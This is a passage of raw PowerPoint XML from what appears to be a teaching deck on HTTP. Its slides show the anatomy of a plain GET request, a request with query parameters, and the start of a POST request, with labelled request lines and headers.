                <a:srgbClr val="1E4B87"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750">
              <a:buFontTx/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2500" b="1" i="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="1E4B87"/>
                </a:solidFill>
              </a:rPr>
              <a:t>When the gateway receives the response, it forwards it to the original client</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="174919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55160F-278D-4C52-B08B-0DBFBD078C04}"/>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373A733-1F34-437D-8D46-BFA2987C41FD}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="76200" y="268069"/>
            <a:ext cx="6963188" cy="646331"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="3600" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00B0F0"/>
                </a:solidFill>
                <a:latin typeface="Arial Black" panose="020B0A04020102020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Helvetica" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Anatomy of a GET Request</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="12" name="Group 11">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{091F7199-BD93-42AE-ACCE-ED691D8D1B70}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="-381000" y="1527037"/>
            <a:ext cx="9525000" cy="3803926"/>
            <a:chOff x="-381000" y="1263984"/>
            <a:chExt cx="9525000" cy="3803926"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="4" name="TextBox 3">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{BC808FF9-7529-4FD3-9E22-2C98B1ED386D}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="-381000" y="1282258"/>
              <a:ext cx="6858000" cy="3785652"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
            <a:ln w="6350">
              <a:noFill/>
              <a:prstDash val="dash"/>
            </a:ln>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="square" rtlCol="0">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:pPr lvl="1"/>
              <a:r>
                <a:rPr lang="en-US" sz="2400" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="bg2"/>
                  </a:solidFill>
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>GET /</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="2400" dirty="0" err="1">
                  <a:solidFill>
                    <a:schemeClr val="bg2"/>
                  </a:solidFill>
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>js</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="2400" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="bg2"/>
                  </a:solidFill>
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>/analytics.js HTTP/1.1</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr lvl="1"/>
              <a:r>
                <a:rPr lang="en-US" sz="2400" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="bg2"/>
                  </a:solidFill>
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>Host: </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="2400" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="bg2"/>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www.target-server.com</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg2"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:endParaRPr>
            </a:p>
            <a:p>
              <a:pPr lvl="1"/>
              <a:r>
                <a:rPr lang="en-US" sz="2400" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="bg2"/>
                  </a:solidFill>
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>Connection: keep-alive</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr lvl="1"/>
              <a:r>
                <a:rPr lang="en-US" sz="2400" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="bg2"/>
                  </a:solidFill>
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>Upgrade-Insecure-Requests: 1</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr lvl="1"/>
              <a:r>
                <a:rPr lang="en-US" sz="2400" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="bg2"/>
                  </a:solidFill>
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>Accept: text/</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="2400" dirty="0" err="1">
                  <a:solidFill>
                    <a:schemeClr val="bg2"/>
                  </a:solidFill>
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>js</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="2400" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="bg2"/>
                  </a:solidFill>
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>, text/html, */*</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr lvl="1"/>
              <a:r>
                <a:rPr lang="en-US" sz="2400" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="bg2"/>
                  </a:solidFill>
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>Accept-Language: </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="2400" dirty="0" err="1">
                  <a:solidFill>
                    <a:schemeClr val="bg2"/>
                  </a:solidFill>
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>en</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="2400" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="bg2"/>
                  </a:solidFill>
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>-us</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr lvl="1"/>
              <a:r>
                <a:rPr lang="en-US" sz="2400" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="bg2"/>
                  </a:solidFill>
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>Accept-Encoding: </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="2400" dirty="0" err="1">
                  <a:solidFill>
                    <a:schemeClr val="bg2"/>
                  </a:solidFill>
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>gzip</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="2400" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="bg2"/>
                  </a:solidFill>
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>, deflate</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr lvl="1"/>
              <a:r>
                <a:rPr lang="en-US" sz="2400" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="bg2"/>
                  </a:solidFill>
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>User-Agent: Mozilla/4.0</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr lvl="1"/>
              <a:endParaRPr lang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg2"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:endParaRPr>
            </a:p>
            <a:p>
              <a:pPr lvl="1"/>
              <a:endParaRPr lang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg2"/>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B732A7D-EE59-4C3E-86B5-573F1E14E03F}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="6781800" y="2755419"/>
              <a:ext cx="2080204" cy="461665"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="square" rtlCol="0">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:r>
                <a:rPr lang="en-US" sz="2400" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="bg2"/>
                  </a:solidFill>
                  <a:latin typeface="Helvetica" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                  <a:cs typeface="Helvetica" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                </a:rPr>
                <a:t>  </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="2400" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="bg2"/>
                  </a:solidFill>
                  <a:latin typeface="Arial Black" panose="020B0A04020102020204" pitchFamily="34" charset="0"/>
                  <a:cs typeface="Helvetica" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                </a:rPr>
                <a:t>HEADERS</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="6" name="Right Brace 5">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{FFC30F05-B047-4895-B71F-D62B0B7EBB8A}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="6512886" y="1752600"/>
              <a:ext cx="431821" cy="2467304"/>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9108008-6E56-4E61-9A6E-467F12DD9B79}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="6408956" y="1263984"/>
              <a:ext cx="2735044" cy="461665"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="none" rtlCol="0">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:r>
                <a:rPr lang="en-US" sz="2400" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="bg2"/>
                  </a:solidFill>
                  <a:latin typeface="Arial Black" panose="020B0A04020102020204" pitchFamily="34" charset="0"/>
                </a:rPr>
                <a:t>REQUEST LINE</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="11" name="TextBox 10">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{CD3917EF-B022-4E71-B569-31425085E190}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="6417694" y="4355619"/>
              <a:ext cx="2471872" cy="461665"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="square" rtlCol="0">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:pPr algn="just"/>
              <a:r>
                <a:rPr lang="en-US" sz="2400" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="bg2"/>
                  </a:solidFill>
                  <a:latin typeface="Arial Black" panose="020B0A04020102020204" pitchFamily="34" charset="0"/>
                  <a:cs typeface="Helvetica" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                </a:rPr>
                <a:t>WHITESPACE</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="16" name="Straight Connector 15">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{541B68B9-42BC-48FE-AF20-9289EB388784}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="152400" y="914400"/>
            <a:ext cx="7315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62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55160F-278D-4C52-B08B-0DBFBD078C04}"/>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373A733-1F34-437D-8D46-BFA2987C41FD}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="76200" y="268069"/>
            <a:ext cx="7509685" cy="646331"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="3600" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00B0F0"/>
                </a:solidFill>
                <a:latin typeface="Arial Black" panose="020B0A04020102020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Helvetica" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Requests with Query Params</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="TextBox 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{BC808FF9-7529-4FD3-9E22-2C98B1ED386D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="-381001" y="1545311"/>
            <a:ext cx="8991601" cy="3785652"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="6350">
            <a:noFill/>
            <a:prstDash val="dash"/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr lvl="1" algn="just"/>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg2"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>GET /</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg2"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>articles?tag</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg2"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>=</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg2"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>latest&amp;author</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg2"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>=jane</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg2"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> HTTP/1.1</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg2"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>Host: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg2"/>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www.target-server.com</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2400" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg2"/>
              </a:solidFill>
              <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg2"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>Connection: keep-alive</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg2"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>Upgrade-Insecure-Requests: 1</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg2"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>Accept: text/html, */*</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg2"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>Accept-Language: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg2"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>en</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg2"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>-us</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg2"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>Accept-Encoding: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg2"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>gzip</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg2"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>, deflate</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg2"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>User-Agent: Mozilla/4.0</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:endParaRPr lang="en-US" sz="2400" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg2"/>
              </a:solidFill>
              <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:endParaRPr lang="en-US" sz="2400" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg2"/>
              </a:solidFill>
              <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="16" name="Straight Connector 15">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{541B68B9-42BC-48FE-AF20-9289EB388784}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="152400" y="914400"/>
            <a:ext cx="7315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264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55160F-278D-4C52-B08B-0DBFBD078C04}"/>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373A733-1F34-437D-8D46-BFA2987C41FD}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="76200" y="268069"/>
            <a:ext cx="7296613" cy="646331"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="3600" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00B0F0"/>
                </a:solidFill>
                <a:latin typeface="Arial Black" panose="020B0A04020102020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Helvetica" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Anatomy of a POST Request</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="12" name="Group 11">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{091F7199-BD93-42AE-ACCE-ED691D8D1B70}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="-381000" y="1527037"/>
            <a:ext cx="9525000" cy="4173258"/>
            <a:chOff x="-381000" y="1263984"/>
            <a:chExt cx="9525000" cy="4173258"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="4" name="TextBox 3">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{BC808FF9-7529-4FD3-9E22-2C98B1ED386D}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
